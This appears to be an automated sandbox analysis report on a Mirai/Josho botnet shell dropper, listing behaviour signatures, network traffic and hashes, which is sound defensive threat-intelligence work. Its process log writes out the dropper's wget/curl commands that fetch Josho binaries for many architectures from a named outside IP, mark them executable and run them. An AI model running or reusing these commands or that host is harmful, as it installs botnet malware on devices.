Malware Analysis Report

2024-11-15 05:43

Sample ID 240427-wkt84aeb7v
Target 8UsA.sh
SHA256 09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9
Tags
mirai josho botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9

Threat Level: Known bad

The file 8UsA.sh was found to be: Known bad.

Malicious Activity Summary

mirai josho botnet

Mirai

Executes dropped EXE

Modifies Watchdog functionality

Changes its process name

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-27 17:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-27 17:59

Reported

2024-04-27 18:02

Platform

ubuntu1804-amd64-20240226-en

Max time kernel

148s

Max time network

149s

Command Line

[/tmp/8UsA.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/watchdog /tmp/3AvA N/A
File opened for modification /dev/misc/watchdog /tmp/3AvA N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Josho.mips /usr/bin/wget N/A
File opened for modification /tmp/Josho.arm4 /usr/bin/curl N/A
File opened for modification /tmp/Josho.arm5 /usr/bin/wget N/A
File opened for modification /tmp/Josho.arm6 /usr/bin/curl N/A
File opened for modification /tmp/Josho.arm7 /usr/bin/wget N/A
File opened for modification /tmp/Josho.m68k /usr/bin/curl N/A
File opened for modification /tmp/Josho.sh4 /usr/bin/curl N/A
File opened for modification /tmp/3AvA /tmp/8UsA.sh N/A
File opened for modification /tmp/Josho.x86 /usr/bin/curl N/A
File opened for modification /tmp/Josho.mips /usr/bin/curl N/A
File opened for modification /tmp/Josho.mpsl /usr/bin/wget N/A
File opened for modification /tmp/Josho.arm6 /usr/bin/wget N/A
File opened for modification /tmp/Josho.arm7 /usr/bin/curl N/A
File opened for modification /tmp/Josho.x86 /usr/bin/wget N/A
File opened for modification /tmp/Josho.ppc /usr/bin/wget N/A
File opened for modification /tmp/Josho.ppc /usr/bin/curl N/A
File opened for modification /tmp/Josho.m68k /usr/bin/wget N/A
File opened for modification /tmp/Josho.sh4 /usr/bin/wget N/A
File opened for modification /tmp/Josho.mpsl /usr/bin/curl N/A
File opened for modification /tmp/Josho.arm5 /usr/bin/curl N/A

Processes

/tmp/8UsA.sh

[/tmp/8UsA.sh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.x86]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.x86]

/bin/cat

[cat Josho.x86]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.mips]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.mips]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.mpsl]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.mpsl]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm4]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm4]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm5]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm5]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm6]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm6]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm7]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm7]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.ppc]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.ppc]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.m68k]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.m68k]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.sh4]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.sh4]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

Network

Country Destination Domain Proto
BR 209.14.69.249:80 209.14.69.249 tcp
N/A 224.0.0.251:5353 udp
US 151.101.130.49:443 tcp
US 1.1.1.1:53 cdn.fwupd.org udp
US 1.1.1.1:53 cdn.fwupd.org udp
US 151.101.194.49:443 cdn.fwupd.org tcp
BR 209.14.69.249:80 209.14.69.249 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.5:443 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:80 209.14.69.249 tcp
BR 209.14.69.249:666 tcp

Files

/tmp/Josho.x86

MD5 a648e3916f191a59f47d07a49702d0eb
SHA1 1d9280fd392858f5dbe61aea4cfa2453ade97442
SHA256 0a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3
SHA512 73ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587